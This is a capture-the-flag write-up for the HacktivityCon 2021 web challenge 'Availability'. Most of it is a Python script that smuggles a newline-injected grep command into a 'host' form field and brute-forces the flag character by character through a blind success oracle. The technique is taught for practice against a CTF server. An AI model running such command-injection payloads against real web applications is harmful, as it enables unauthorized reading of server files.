
Writeup for Availability (Web) - HacktivityCon CTF (2021) 💜

Video Walkthrough

Challenge Description

My schol was trying to teach people about the CIA triad so they made all these dumb example applications... as if they know anything about information security.

They said they fixed the bug from the last app, but they also said they knew they went overboard with the filtered characters, so they loosened things up a bit. Can you hack it?


import requests
import string

flag = "flag."
url = "http://challenge.ctf.games:30669/"

# Each time a successful login is seen, restart loop
restart = True

while restart:
    restart = False
    # Loop through chars
    for i in string.ascii_lowercase + string.digits:
        payload = flag + i
        post_data = {'host': '\x0Agrep ' + payload + ' flag.txt'}
        r = requests.post(url, data=post_data)
        # Correct char results in "successful password"
        if 'Success' in r.text:
            print(payload.replace('.', '{'))
            restart = True
            flag = payload
            # Exit if we have flag{32-hex
            if len(flag) == 37:
                print('\nFlag: ' + flag.replace('.', '{') + '}')

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